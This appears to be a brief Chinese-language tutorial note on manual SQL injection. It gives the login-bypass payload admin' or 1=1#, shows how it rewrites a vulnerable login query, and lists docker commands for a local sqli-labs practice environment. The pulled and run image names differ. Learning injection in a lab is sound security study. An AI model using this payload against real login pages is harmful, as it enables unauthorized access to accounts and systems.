爲什麼要學習手工注入?
工具:sqlmap
萬能密碼,直接登錄到後臺頁面,不需要密碼:admin' or 1=1#,當後臺存在注入的話,才能使用注入密碼,不是所有的網站進行登錄。
當輸入admin,admin,在後臺的SQL語句是:
select * from user where username='$user' and password='pass';
提交的代碼時,語句是:
select * from user where username='admin' or 1=1#' and password='pass';
輸入單引號是將前面的SQL語句,進行閉合,後面的#會將後面的語句註釋掉,進行查詢是,1=1,是永正的語句,所以在有漏掉的前提下,可以不用密碼,就可登陸。
本地搭建(docker):
docker pull c0ny1/sqli-labs
docker run -dt --name sqli-lab -p 8003:80 acgpiano/sqli-labs:latest